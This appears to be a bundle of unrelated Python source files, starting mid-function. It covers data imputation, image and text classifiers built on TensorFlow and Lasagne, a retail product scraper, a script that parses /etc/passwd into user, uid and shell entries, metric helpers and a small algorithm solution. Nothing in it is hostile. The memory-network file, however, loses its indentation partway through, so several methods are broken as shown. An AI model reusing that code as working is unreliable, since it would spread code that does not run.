        removed_column_method.dropna(how="any", axis="columns", inplace=True)
        # Method TWO: Fill all nan values with mean of column
        # Note: Obviously missing data in the "smoking_status" column will not be replaced, as they don't have a mean value
        mean_method = data.copy()
        mean_method["bmi"].fillna(mean_method["bmi"].mean(), inplace=True)
        # Create train data and prediction matrices for Linear Regression and KNN Regression
        train_data = data.copy().dropna(subset=["bmi"], how="any", axis="index").drop("id", axis="columns")
        # Apply label encoding and one hot encoding to categorical data
        train_data.smoking_status = LabelEncoder().fit_transform(train_data.smoking_status)
        train_data.ever_married = train_data.ever_married.replace(["Yes", "No"], [1, 0])
        train_data.gender = LabelEncoder().fit_transform(train_data.gender)
        train_data = pd.get_dummies(data=train_data)
        # Apply encoding to output data as well
        predction_matrix = data.copy().drop("id", axis="columns")
        predction_matrix.smoking_status = LabelEncoder().fit_transform(predction_matrix.smoking_status)
        predction_matrix.gender = LabelEncoder().fit_transform(predction_matrix.gender)
        predction_matrix.ever_married = predction_matrix.ever_married.replace(["Yes", "No"], [1, 0])
        predction_matrix = pd.get_dummies(data=predction_matrix)
        # Create Linear regression Model
        linear_regression_model = LinearRegression().fit(train_data.drop("bmi", axis="columns"), train_data["bmi"])
        # Method THREE: Fill all nan values with prediction from linear regression
        linear_reg_method = data.copy()
        # For each element in prediction matrix check if it is np.nan and predict value if it is and place it in data
        for i in predction_matrix.index:
            linear_reg_method.at[i, "bmi"] = (
                linear_regression_model.predict(np.array([predction_matrix.loc[i].drop("bmi", axis="index")]))[0]
                if np.isnan(predction_matrix.at[i, "bmi"])
                else predction_matrix.at[i, "bmi"]
            )
        # Method FOUR: Fill all nan values with prediction from KNN
        knn_reg_method = data.copy()
        knn_model = KNeighborsRegressor(n_neighbors=5).fit(train_data.drop("bmi", axis="columns"), train_data["bmi"])
        # For each element in prediction matrix check if it is np.nan and predict value if it is and place it in data
        for i in predction_matrix.index:
            knn_reg_method.at[i, "bmi"] = (
                knn_model.predict(np.array([predction_matrix.loc[i].drop("bmi", axis="index")]))[0]
                if np.isnan(predction_matrix.at[i, "bmi"])
                else predction_matrix.at[i, "bmi"]
            )
        return [removed_column_method, mean_method, linear_reg_method, knn_reg_method]
|
from django.contrib import admin
from players.models import Player, Cron, Mop

# Expose the player-related models in the Django admin, in the same
# registration order as before.
for model in (Player, Cron, Mop):
    admin.site.register(model)
|
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from urllib import urlretrieve
import cPickle as pickle
import os
import gzip
import sys
from util import *
# Pickled CNNs can be deeply nested; raise the limit so unpickling succeeds.
sys.setrecursionlimit(10000)
import numpy as np
import theano
import glob
import numpy
import PIL
from PIL import Image,ImageMath
import lasagne
from lasagne import layers
# Setting the device as CPU, sadly wont work since CNN trained on a CUDA machine.
# NOTE(review): THEANO_FLAGS is read when theano is imported, so setting it
# here (after ``import theano`` above) has no effect -- it must be set
# before the import or in the environment.
os.environ['THEANO_FLAGS']="device=cpu"
from lasagne.updates import nesterov_momentum
from lasagne.updates import adadelta
from nolearn.lasagne import NeuralNet
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
def predCifar():
    """Classify ./image.jpg with the pickled CIFAR network and return the
    predicted class name (a string from batches.meta's label_names)."""
    with open('netpickleCifar','rb') as f:
        neuralNet = pickle.load(f)
    # Load the image and shape it into the (1, 3, 32, 32) NCHW float tensor
    # the network expects, scaled to [0, 1).
    img = Image.open('image.jpg').resize((32,32),PIL.Image.NEAREST)
    img = numpy.asarray(img, dtype='float32') / 256.
    img_ = img.transpose(2, 0, 1).reshape(1, 3, 32, 32)
    # Load the class names.  NOTE(review): ``dict`` shadows the builtin here.
    fo = open('batches.meta', 'rb')
    dict = pickle.load(fo)
    fo.close()
    listnames = dict['label_names']
    # Predict and map the label index to its human-readable name.
    prediction = neuralNet.predict(img_)
    return listnames[prediction[0]]
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""End-To-End Memory Networks.
The implementation is based on http://arxiv.org/abs/1503.08895 [1]
"""
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
import json
import ConfigParser
from word import Word
from six.moves import range
from data_unit import cut2list
def zero_nil_slot(t, name=None):
    """
    Overwrites the nil_slot (first row) of the input Tensor with zeros.
    The nil_slot is a dummy slot and should not be trained and influence
    the training algorithm.
    """
    # tf.op_scope is the pre-TF-1.0 scoping API; kept for compatibility.
    with tf.op_scope([t], name, "zero_nil_slot") as name:
        t = tf.convert_to_tensor(t, name="t")
        s = tf.shape(t)[1]
        z = tf.zeros(tf.stack([1, s]))
        # Stack a zero row on top of rows 1..N-1 of t.
        return tf.concat(axis=0, values=[z, tf.slice(t, [1, 0], [-1, -1])], name=name)
def add_gradient_noise(t, stddev=1e-3, name=None):
    """
    Adds gradient noise as described in http://arxiv.org/abs/1511.06807 [2].
    The input Tensor `t` should be a gradient.
    The output will be `t` + gaussian noise.
    0.001 was said to be a good fixed value for memory networks [2].
    """
    with tf.op_scope([t, stddev], name, "add_gradient_noise") as name:
        t = tf.convert_to_tensor(t, name="t")
        # Zero-mean Gaussian noise with the same shape as the gradient.
        gn = tf.random_normal(tf.shape(t), stddev=stddev)
        return tf.add(t, gn, name=name)
class MemN2N(object):
"""End-To-End Memory Network."""
    def __init__(self, batch_size, answer_size, sentence_size, embedding_size,
                 hops=3,
                 max_grad_norm=40.0,
                 nonlin=None,
                 initializer=tf.random_normal_initializer(stddev=0.1),
                 session=tf.Session(),
                 name='MemN2N'):
        """Creates an End-To-End Memory Network
        Args:
        batch_size: The size of the batch.
        vocab_size: The size of the vocabulary (should include the nil word). The nil word
        one-hot encoding should be 0.
        sentence_size: The max size of a sentence in the data. All sentences should be padded
        to this length. If padding is required it should be done with nil one-hot encoding (0).
        embedding_size: The size of the word embedding.
        hops: The number of hops. A hop consists of reading and addressing a memory slot.
        Defaults to `3`.
        max_grad_norm: Maximum L2 norm clipping value. Defaults to `40.0`.
        nonlin: Non-linearity. Defaults to `None`.
        initializer: Weight initializer. Defaults to `tf.random_normal_initializer(stddev=0.1)`.
        encoding: A function returning a 2D Tensor (sentence_size, embedding_size). Defaults to `position_encoding`.
        session: Tensorflow Session the model is run with. Defaults to `tf.Session()`.
        name: Name of the End-To-End Memory Network. Defaults to `MemN2N`.
        """
        # NOTE(review): the ``session=tf.Session()`` default is evaluated once
        # at import time and shared across instances -- pass a session explicitly.
        self.writer = tf.summary.FileWriter("./tensorboard/logs", session.graph)
        self.vacob = {}  # NOTE(review): likely a typo for "vocab"; kept for compatibility
        self.answer = []
        self.word = Word()
        self._batch_size = batch_size
        self._answer_size = answer_size
        self._sentence_size = sentence_size
        self._embedding_size = embedding_size
        self._hops = hops
        self._max_grad_norm = max_grad_norm
        self._nonlin = nonlin
        self._init = initializer
        self._name = name
        self._build_inputs()
        self._build_vars()
        self._opt = tf.train.GradientDescentOptimizer(learning_rate=self._lr)
        # cross entropy
        logits = self._inference(self._queries) # (batch_size, vocab_size)
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=tf.cast(self._answers, tf.float32), name="cross_entropy")
        cross_entropy_sum = tf.reduce_sum(cross_entropy, name="cross_entropy_sum")
        # loss op
        loss_op = cross_entropy_sum
        tf.summary.scalar("cost", loss_op)
        # gradient pipeline: clip, add noise, and zero the nil-slot gradients
        grads_and_vars = self._opt.compute_gradients(loss_op)
        grads_and_vars = [(tf.clip_by_norm(g, self._max_grad_norm), v) for g,v in grads_and_vars]
        grads_and_vars = [(add_gradient_noise(g), v) for g,v in grads_and_vars]
        nil_grads_and_vars = []
        for g, v in grads_and_vars:
            if v.name in self._nil_vars:
                nil_grads_and_vars.append((zero_nil_slot(g), v))
            else:
                nil_grads_and_vars.append((g, v))
        train_op = self._opt.apply_gradients(nil_grads_and_vars, name="train_op")
        # predict ops
        predict_op = tf.argmax(logits, 1, name="predict_op")
        predict_proba_op = tf.nn.softmax(logits, name="predict_proba_op")
        predict_log_proba_op = tf.log(predict_proba_op, name="predict_log_proba_op")
        # assign ops
        self.loss_op = loss_op
        self.predict_op = predict_op
        self.predict_proba_op = predict_proba_op
        self.predict_log_proba_op = predict_log_proba_op
        self.train_op = train_op
        init_op = tf.global_variables_initializer()
        self._sess = session
        self._sess.run(init_op)
        self.saver = tf.train.Saver()
        self.merge = tf.summary.merge_all()
    def _build_inputs(self):
        """Define the graph input placeholders.

        queries are fed pre-embedded (batch, sentence_size, embedding_size);
        answers are one-hot labels (batch, answer_size); the learning rate is
        a scalar fed per training step (see batch_fit).
        """
        self._queries = tf.placeholder(tf.float32, [None, self._sentence_size, self._embedding_size], name="queries")
        self._answers = tf.placeholder(tf.int32, [None, self._answer_size], name="answers")
        self._lr = tf.placeholder(tf.float32, [], name="learning_rate")
    def _build_vars(self):
        """Create the trainable variables: question embedding A_1, one memory
        embedding C per hop, and the output projection W."""
        with tf.variable_scope(self._name):
            A = self._init([self._sentence_size, self._embedding_size])
            C = self._init([self._sentence_size, self._embedding_size])
            W = self._init([self._answer_size, self._embedding_size])
            self.W = tf.Variable(W, name="W")
            # A_1 embeds the question; adjacent weight sharing reuses the
            # previous hop's C as the next hop's A (see _inference).
            self.A_1 = tf.Variable(A, name="A")
            tf.summary.histogram('W', self.W)
            tf.summary.histogram('A_1', self.A_1)
            self.C = []
            # One C embedding per hop, each under its own variable scope.
            for hopn in range(self._hops):
                with tf.variable_scope('hop_{}'.format(hopn)):
                    self.C.append(tf.Variable(C, name="C"))
                    tf.summary.histogram('hop_{}'.format(hopn), self.C[-1])
            # Dont use projection for layerwise weight sharing
            # self.H = tf.Variable(self._init([self._embedding_size, self._embedding_size]), name="H")
            # Use final C as replacement for W
            # self.W = tf.Variable(self._init([self._embedding_size, self._vocab_size]), name="W")
            # Variables whose nil (padding) row must keep zero gradients;
            # consumed in __init__ via zero_nil_slot.
            self._nil_vars = set([self.A_1.name] + [x.name for x in self.C])
    def _inference(self, queries):
        """Run the memory hops over pre-embedded queries and return answer logits.

        Args:
            queries: float tensor (batch, sentence_size, embedding_size)
        Returns:
            logits over answers, shape (batch, answer_size)
        """
        with tf.variable_scope(self._name):
            # Use A_1 for the question embedding as per Adjacent Weight Sharing
            q_emb = self.A_1 * queries
            # Sum word embeddings over the sentence dimension -> (batch, embedding_size)
            u_0 = tf.reduce_sum(q_emb, 1)
            u = [u_0]
            for hopn in range(self._hops):
                if hopn == 0:
                    m_emb_A = self.A_1 * queries
                    m_A = tf.reduce_sum(m_emb_A, 1)
                else:
                    # Adjacent sharing: hop n's input embedding is hop n-1's C.
                    with tf.variable_scope('hop_{}'.format(hopn - 1)):
                        m_emb_A = self.C[hopn - 1] * queries
                        m_A = tf.reduce_sum(m_emb_A, 1)
                # hack to get around no reduce_dot
                u_temp = tf.transpose(u[-1], [0, 1])
                dotted = tf.reduce_sum(m_A * u_temp, 1)
                # Calculate probabilities
                probs = tf.nn.softmax(dotted)
                probs_temp = tf.transpose(tf.expand_dims(probs, -1), [1, 0])
                with tf.variable_scope('hop_{}'.format(hopn)):
                    m_emb_C = self.C[hopn] * queries
                    m_C = tf.reduce_sum(m_emb_C, 1)
                c_temp = tf.transpose(m_C, [1, 0])
                o_k = tf.reduce_sum(c_temp * probs_temp, 1)
                # Dont use projection layer for adj weight sharing
                # u_k = tf.matmul(u[-1], self.H) + o_k
                u_k = u[-1] + o_k
                # nonlinearity
                # NOTE(review): this calls a module-level `nonlin` while gating on
                # self._nonlin -- confirm `nonlin` is the intended callable.
                if self._nonlin:
                    u_k = nonlin(u_k)
                u.append(u_k)
            # Use last C for output (transposed)
            with tf.variable_scope('hop_{}'.format(self._hops)):
                return tf.matmul(u_k, tf.transpose(self.W, [1,0]))
    def batch_fit(self, queries, answers, learning_rate):
        """Runs the training algorithm over the passed batch
        Args:
            queries: Tensor (None, sentence_size, embedding_size), pre-embedded queries
            answers: Tensor (None, answer_size), one-hot answer labels
            learning_rate: float scalar learning rate for this step
        Returns:
            loss: floating-point number, the loss computed for the batch
            summary: merged tf.summary result for TensorBoard logging
        """
        feed_dict = {self._queries: queries, self._answers: answers, self._lr: learning_rate}
        loss, _, summary = self._sess.run([self.loss_op, self.train_op, self.merge], feed_dict=feed_dict)
        return loss, summary
def predict(self, queries):
"""Predicts answers as one-hot encoding.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_op, feed_dict=feed_dict)
def predict_proba(self, queries):
"""Predicts probabilities of answers.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_proba_op, feed_dict=feed_dict)
def predict_log_proba(self, queries):
"""Predicts log probabilities of answers.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_log_proba_op, feed_dict=feed_dict)
    def load(self, checkpoint_dir):
        """Restore model weights from the latest checkpoint in `checkpoint_dir`
        and load the answer strings from ./data/ans.json into self.answer."""
        tf.logging.warning("model start load")
        with open("./data/ans.json", 'r') as pf:
            self.answer = json.load(pf)
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        if ckpt and ckpt.model_checkpoint_path:
            self.saver.restore(self._sess, ckpt.model_checkpoint_path)
            tf.logging.warning("model restore success")
        else:
            # Missing/invalid checkpoint: log and continue with fresh weights.
            tf.logging.error("model restore wrong!")
def find_simword(self, word):
simword = ""
maxscore = 0
for index, value in enumerate(self.vacob.keys()):
score = self.word.word_sim(value, word)
if score > maxscore:
simword = value
maxscore = score
tf.logging.warning("find_simword, word is {}, simword is {}".format(word, simword))
return simword
    def string_to_vec(self, string):
        """Embed a raw sentence into a (sentence_size, embedding_size) nested list.

        Assumes the tokenized sentence has at most self._sentence_size words
        -- TODO confirm longer inputs cannot occur (no bounds check here).
        """
        # Rows are replaced (not mutated) below, so the shared-row aliasing
        # produced by list multiplication is harmless here.
        vector = [[0] * self._embedding_size] * self._sentence_size
        strlist = cut2list(string)
        for index, word in enumerate(strlist):
            vecjs = self.word.word_vec(word)
            vec = json.loads(vecjs)
            # Python 2 (`unicode`): the embedding service may return doubly
            # JSON-encoded data, so keep decoding until a real list appears.
            while isinstance(vec, unicode):
                vec = json.loads(vec)
            vector[index] = vec
        return vector
    def vec_to_answer(self, maxindex):
        """Map a predicted answer index back to its answer string (loaded by load())."""
        return self.answer[maxindex]
    def respond(self, query):
        """Return the chatbot's answer string for a raw query sentence."""
        qvec = self.string_to_vec(query)
        # Wrap in a list: the graph expects a batch; here the batch size is 1.
        feed_dict = {self._queries:[qvec]}
        maxindex = self._sess.run(self.predict_op, feed_dict=feed_dict)
        answer = self.vec_to_answer(maxindex[0])
        return answer
if __name__ == "__main__":
    # for test
    # Python 2 script (ConfigParser / raw_input): read hyper-parameters from
    # ./data/RNN.cfg, restore the trained model and chat on stdin.
    mdir = "./tensorboard/logs/"
    conf = ConfigParser.ConfigParser()
    conf.read("./data/RNN.cfg")
    batch_size = int(conf.get("RNN", "batch_size"))
    answer_size = int(conf.get("RNN", "answer_size"))
    sentence_size = int(conf.get("RNN", "sentence_size"))
    embedding_size = int(conf.get("RNN", "embedding_size"))
    hops = int(conf.get("RNN", "hops"))
    max_grad_norm = float(conf.get("RNN", "max_grad_norm"))
    with tf.Session() as sess:
        model = MemN2N(batch_size, answer_size, sentence_size, embedding_size, session=sess,
                       hops=hops, max_grad_norm=max_grad_norm)
        model.load('./model/rnn/')
        # Read-eval loop: print the model's answer for each input line.
        while(1):
            print(model.respond(raw_input(">")))
|
from abc import ABC, abstractmethod
class Instruccion(ABC):
    """Abstract base class for every AST instruction node.

    Concrete instructions must implement interpretar() and getNodo().
    """

    def __init__(self, fila, columna):
        # Source position of the instruction plus an "is array" flag,
        # which always starts out False.
        self.fila = fila
        self.columna = columna
        self.arreglo = False
        super().__init__()

    @abstractmethod
    def interpretar(self, tree, table):
        """Execute this instruction against the AST and symbol table."""

    @abstractmethod
    def getNodo(self):
        """Return the graph/report node representing this instruction."""
|
import sys
sys.path.append('../STANDAR_LIBRARIES')
from URL_Lib import descargarResultadoData, descargarResultado, descargarResultadoDataSinBeautiful
from File_Lib import saveFile, saveFileExc, loadFile
import re
import requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import http.client
http.client._MAXHEADERS = 1000
#
#
# ********************************** Programa principal **********************************
#
#
def escanearProducto(url):
    """Scrape one academy.com product page and append one CSV row per variant
    to the module-level listaResultados, persisting progress after each page.

    Extraction relies on brittle string-splitting of the rendered HTML, so any
    markup change on the site breaks the field parsing.
    """
    if (url in listaDone):
        return
    # Progress percentage: (done + failed) over the full work list.
    porce = str( ( (len(listaDone) + len(listaFallo) ) / len(listaProductos))*100);
    print( porce[0:4]+ '% Escaneado ... ' +url )
    conn = http.client.HTTPSConnection("www.academy.com")
    headers = { }
    cant =0
    conn.request("GET", url, headers=headers)
    res = conn.getresponse()
    data = res.read()
    # try:
    #aaa = data.decode('unicode').encode('utf-8')
    #print(data)
    aaa = data.decode('utf8', 'replace')
    pagina = BeautifulSoup(aaa, 'html.parser');
    try:
        parentSKU = pagina.prettify().split('"parent_sku": "')[1].split('"')[0];
    except:
        # Page has no parent SKU: record the failure and persist the list.
        listaFallo.append(url + '; No parentSKU')
        saveFile('productos_fail.csv', listaFallo)
        return
    titulo = pagina.find_all('h1', class_='rpdp-product-title')[0].text
    marca = pagina.prettify().split('itemprop="brand">')[1].split('<')[0].strip()
    descripcion = pagina.prettify().split('itemprop="description">')[1].split('<')[0].strip()
    categoria2 = pagina.prettify().split('id="brBreadCrum"')[1].split('value="')[1].split('"')[0].replace('&','&');
    # Breadcrumb looks like 'Academy|level1|level2|level3|...'; keep up to 3 levels.
    if (len(categoria2.split('|'))>3 ):
        categoria = categoria2.split('|')[1] + ' --> ' + categoria2.split('|')[2] + ' --> ' + categoria2.split('|')[3]
    else:
        categoria = categoria2.replace('Academy|','');
    # conn.request("GET", 'https://www.academy.com/shop/AYRStoreLocatorServiceCmd?lat=40.8201966&lon=-96.70047629999999&ParentSKU=' + parentSKU, headers=headers)
    # res = conn.getresponse()
    # data = res.read()
    # aaa = data.decode("utf-8")
    # paginaStock = BeautifulSoup(aaa, 'html.parser');
    # One chunk per product variant (split on the catentry_id marker).
    valores = pagina.prettify().split('catentry_id');
    for yyy in valores:
        if ('"Attributes" :' in yyy):
            resursos = yyy.split('"Attributes" : {')[1].split('}')[0] ;
            bbb = resursos.split(',');
            foto0 = yyy.split('ItemImage" : "//')[1].split('"')[0] ;
            fotos = yyy.split('"DescAttributes" : {')[1].split('}')[0] ;
            fotos = fotos.split(',');
            # Up to three additional photos; missing ones become ''.
            try:
                foto1 = fotos[0].split('"')[1].replace('image_','').split('#//')[1].strip();
            except:
                foto1 = ''
            try:
                foto2 = fotos[1].split('"')[1].replace('image_','').split('#//')[1].strip();
            except:
                foto2 = ''
            try:
                foto3 = fotos[2].split('"')[1].replace('image_','').split('#//')[1].strip();
            except:
                foto3 = ''
            item = yyy.split('mfPartNumber')[1].split(',')[0].replace('" : "','').replace('"','').strip()
            sku = yyy.split('partNumber')[1].split(',')[0].replace('" : "','').replace('"','').strip()
            precio = yyy.split('listPrice')[1].split(',')[0].replace('" : "','').replace('"','').replace(':','').strip()
            try:
                color = bbb[0].split('"')[1].replace('Color_','').strip();
            except:
                color = ''
            try:
                tamanio = bbb[1].split('"')[1].replace('Size_','').strip();
            except:
                tamanio = ''
            # Semicolon-separated CSV row for this variant.
            listaResultados.append(parentSKU + ';' + item + ';' + sku + ';' + color + ';' + tamanio + ';' + titulo + ';' + marca + ';' + precio + ';' + descripcion + ';' + foto0 +';' + foto1 + ';' + foto2 + ';' + foto3 + ';' + categoria + ';' + url)
    # Persist the accumulated rows and mark this URL as scanned.
    saveFile('productos_datos.csv', listaResultados)
    listaDone.append(url)
    saveFile('productos_ya_escaneados.csv', listaDone)
    return;
# Build the de-duplicated work list of product URLs (order preserved).
listaProductos = []
listaProductosAux = []
loadFile('productos_links.csv', listaProductosAux)
for aa in listaProductosAux:
    if aa not in listaProductos:
        listaProductos.append(aa);
# Resume state: previously scanned URLs, collected rows and failures.
listaDone = []
listaResultados = []
listaFallo = []
loadFile('productos_ya_escaneados.csv', listaDone)
loadFile('productos_datos.csv', listaResultados)
for pagina in listaProductos:
    try:
        escanearProducto(pagina);
    except KeyboardInterrupt:
        # Allow a clean manual stop with Ctrl-C.
        print('The user abort the script.')
        sys.exit()
    # except UnicodeDecodeError:
    #     print('Fallo ' + pagina)
    #     listaFallo.append(pagina)
    #     saveFile('fallo.csv', listaFallo)
    # except:
    #     print('Fallo ' + pagina)
    #     listaFallo.append(pagina)
    #     saveFile('fallo.csv', listaFallo)
#for prod in listaProductos:
#    escanearProducto(prod);
#    saveFile('pino.csv',listaResultados);
#!/usr/bin/env python
"""Build a {username: [uid, gid, shell]} mapping from /etc/passwd."""


def parse_passwd(text):
    """Parse passwd-format text into {user: [uid, gid, shell]}.

    Comment lines (leading '#') are skipped, as are blank/malformed lines
    (the old code raised IndexError on those).
    """
    data = {}
    for line in text.split('\n'):
        if line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) < 4:
            # Blank or malformed line: nothing usable to extract.
            continue
        data[fields[0]] = [fields[2], fields[3], fields[-1]]
    return data


if __name__ == '__main__':
    # Read the file directly instead of shelling out via the Python 2-only
    # `commands` module (`commands.getoutput('cat /etc/passwd')`), which was
    # removed in Python 3.
    with open('/etc/passwd') as f:
        print(parse_passwd(f.read()))
|
import os
import sys
import tensorflow as tf
import cnn_vgg16
import nn_config
DEFAULT_IMG_CATEGORIES_FILE = os.path.join('DATA', 'Anno', 'list_category_cloth.txt')
DEFAULT_IMG_ATTR_FILE = os.path.join('DATA', 'Anno', 'list_attr_cloth.txt')
DEFAULT_CATEGORY_MODEL_DIR = "category_convnet_model"
DEFAULT_ATTRIBUTE_MODEL_DIR = "attribute_tagging_convnet_model"
DEFAULT_THRESHOLD = 0.7
class ImageProcessor(object):
    """Predicts a clothing category and attribute tags for an image using two
    pre-trained TensorFlow estimators (VGG16-based CNNs from cnn_vgg16)."""

    def __init__(self,
                 category_model_dir=DEFAULT_CATEGORY_MODEL_DIR,
                 attribute_model_dir=DEFAULT_ATTRIBUTE_MODEL_DIR,
                 attribute_threshold=DEFAULT_THRESHOLD,
                 category_name_file=DEFAULT_IMG_CATEGORIES_FILE,
                 attribute_name_file=DEFAULT_IMG_ATTR_FILE):
        """Build the two estimators and load human-readable label names.

        Raises:
            ValueError: if the category model directory does not exist.
        """
        if not os.path.exists(category_model_dir):
            error_msg = "Category model directory ({}) does not exist"
            raise ValueError(error_msg.format(category_model_dir))
        # NOTE(review): attribute_model_dir is not existence-checked like
        # category_model_dir -- confirm whether that asymmetry is intended.
        self.category_classifier = tf.estimator.Estimator(
            model_fn=cnn_vgg16.category_classifier_model,
            model_dir=category_model_dir)
        self.attribute_classifier = tf.estimator.Estimator(
            model_fn=cnn_vgg16.attribute_tagging_model,
            model_dir=attribute_model_dir)
        # Minimum probability for an attribute to be reported.
        self.attribute_threshold = attribute_threshold
        self.category_name = [name for name, number in nn_config.SELECTED_CATEGORIES]
        self.attribute_name = ImageProcessor._get_names(attribute_name_file)

    @staticmethod
    def _get_names(filename):
        """Read display names from a DeepFashion-style list file.

        The first two lines (count + column header) are skipped; each
        remaining line holds a name followed by a type column, so the last
        whitespace-separated token is dropped.
        """
        if not os.path.exists(filename):
            raise RuntimeError("Name file ({}) does not exist".format(filename))
        with open(filename) as f:
            lines = f.readlines()

        def _get_name_from_line(line):
            words = line.split()
            all_but_last = words[:-1]
            return " ".join(all_but_last)

        return [_get_name_from_line(line) for line in lines[2:]]

    @staticmethod
    def _build_neural_net_input(img_filename):
        # Single-element dataset so the estimator predicts for exactly one image.
        dataset = tf.data.Dataset.from_tensor_slices([img_filename])
        return dataset.map(cnn_vgg16.pre_process_image_filename)

    def predict_category(self, img_filename):
        """Return (class_index, class_name) for the image.

        Raises:
            RuntimeError: if the estimator yields no prediction, a malformed
                prediction dict, or an out-of-range class index.
        """
        input_fn = lambda: ImageProcessor._build_neural_net_input(img_filename)
        category_spec = self.category_classifier.predict(input_fn=input_fn)
        predictions = list(category_spec)
        # Previously an empty prediction list escaped as a bare IndexError;
        # surface it as the same RuntimeError family callers already handle.
        if not predictions:
            raise RuntimeError("Classifier produced no predictions")
        try:
            img_class = predictions[0]["classes"]
        except KeyError:
            raise RuntimeError("Prediction dictionary is malformed: " + str(predictions[0]))
        img_class = int(img_class)
        if img_class not in range(len(self.category_name)):
            raise RuntimeError("Predicted an invalid class: {}".format(img_class))
        return img_class, self.category_name[img_class]

    def predict_attributes(self, img_filename):
        """Return (attribute_indices, attribute_names) whose predicted
        probability is at least self.attribute_threshold.

        Raises:
            RuntimeError: if the estimator yields no prediction at all.
        """
        input_fn = lambda: ImageProcessor._build_neural_net_input(img_filename)
        attribute_spec = self.attribute_classifier.predict(input_fn=input_fn)
        attribute_spec_results = list(attribute_spec)
        if not attribute_spec_results:
            raise RuntimeError("Classifier produced no predictions")
        attribute_probabilities = attribute_spec_results[0].get("probabilities", [])
        attributes = [i for i, p in enumerate(attribute_probabilities)
                      if p >= self.attribute_threshold]
        attribute_names = [self.attribute_name[a] for a in attributes]
        return attributes, attribute_names
if __name__ == "__main__":
    # CLI usage: image_filepath [attribute_threshold]
    if len(sys.argv) < 2:
        print("Pass in the image filepath")
        exit(1)
    if len(sys.argv) > 2:
        # Optional second argument overrides the attribute probability threshold.
        image_processor = ImageProcessor(attribute_threshold=float(sys.argv[2]))
    else:
        image_processor = ImageProcessor()
    img_path = sys.argv[1]
    category, category_name = image_processor.predict_category(img_path)
    output_msg = "The predicted category for image " \
                 "{} is {} ({})".format(img_path, category, category_name)
    print(output_msg)
    attributes, names = image_processor.predict_attributes(img_path)
    output_msg = "The predicted attributes are " \
                 "{} ({})".format(attributes, names)
    print(output_msg)
|
import numpy as np
def norm_cm(cm):
    '''
    Skew-normalize a 2x2 confusion matrix.

    Column 0 is assumed to hold positive-class counts and column 1
    negative-class counts -- TODO confirm orientation with callers.

    :param cm: 2x2 confusion matrix
    :return: (ncm, skew) where ncm is the skew-normalized confusion matrix
             (negative column divided by the skew factor) and
             skew = num_negatives / num_positives, or 0.0 when there are no
             positive samples.
    '''
    num_pos = np.sum(cm[:, 0])
    num_neg = np.sum(cm[:, 1])
    if num_pos == 0:
        # Degenerate case: no positive samples at all.
        # Return a (matrix, skew) pair like the normal path does; the old
        # code returned only the matrix, which callers such as cm2f1n
        # mis-unpacked into the two rows of the zero matrix.
        print("no positive samples found")
        return np.zeros((2, 2), dtype=np.int32), 0.0
    skew = num_neg / float(num_pos)
    # Scale the negative column down so both classes carry equal weight.
    ncm = np.array([cm[:, 0], cm[:, 1] / skew]).T
    return ncm, skew
def cm2f1n(cm):
    '''
    Compute the skew-normalized F1 score from a confusion matrix.

    :param cm: 2x2 confusion matrix
    :return: (f1n, pn, rn, ncm, s) -- skew-normalized F1, precision and
             recall, the normalized confusion matrix, and the skew factor
    '''
    ncm, s = norm_cm(cm)
    # All three scores stay 0 unless there is at least one true positive.
    f1n, pn, rn = 0, 0, 0
    true_pos = ncm[0, 0]
    if true_pos > 0:
        pn = true_pos / np.sum(ncm[0, :])
        rn = true_pos / np.sum(ncm[:, 0])
        f1n = 2 * pn * rn / (pn + rn)
    return f1n, pn, rn, ncm, s
|
class Solution:
    def countBits(self, num):
        """Return a list where entry i is the number of 1-bits in i, for 0..num."""
        bits = [0] * (num + 1)
        for value in range(1, num + 1):
            # value has the same high bits as value >> 1, plus its own lowest bit.
            bits[value] = bits[value >> 1] + (value & 1)
        return bits
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 20:29:24 2020
@author: rahul
Here we are implementing some dimentionality reduction for the auto-insurance prediction problem
"""
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
from sklearn.metrics import classification_report, f1_score
from sklearn.model_selection import train_test_split, KFold, cross_val_score
# Load the auto-insurance dataset and keep an untouched copy of the raw data.
df = pd.read_csv("Auto_Data.csv")
#print(df.head())
org_df = df.copy()
# define function for getting corelation variables
# define function for getting corelation variables
def find_corr_features(df_corr, pos_corr_thresh = 0.5, neg_corr_thresh = -0.5):
    """Collect feature pairs whose correlation crosses either threshold.

    Only the lower triangle of ``df_corr`` is scanned (the inner loop stops
    at the diagonal), so each unordered pair is reported at most once.

    Returns a tuple (positive_pairs, negative_pairs) of
    (row_label, col_label, correlation) triples.
    """
    positive_pairs = []
    negative_pairs = []
    for row_label in df_corr.index:
        for col_label in df_corr.columns:
            if row_label == col_label:
                # Reached the diagonal: skip the (mirrored) upper triangle.
                break
            value = df_corr.loc[row_label, col_label]
            if value < neg_corr_thresh:
                negative_pairs.append((row_label, col_label, value))
            elif value > pos_corr_thresh:
                positive_pairs.append((row_label, col_label, value))
    return (positive_pairs, negative_pairs)
# define function for plotting pie charts for categorical columns
# define function for plotting pie charts for categorical columns
def plot_pie_charts(df_to_plot, cols_to_plot):
    """Draw one pie chart per listed column showing its value distribution."""
    for column in cols_to_plot:
        plt.figure()
        # value_counts() yields category frequencies; autopct prints percentages.
        df_to_plot[column].value_counts().plot(kind='pie', figsize=(5,5), autopct='%1.2f%%')
        plt.title(column)
# **************** Clean the data *******************
# drop duplicates
df = df.drop_duplicates()
print(df.shape)
df.drop('id',axis=1, inplace=True) # drop the id column as its not needed
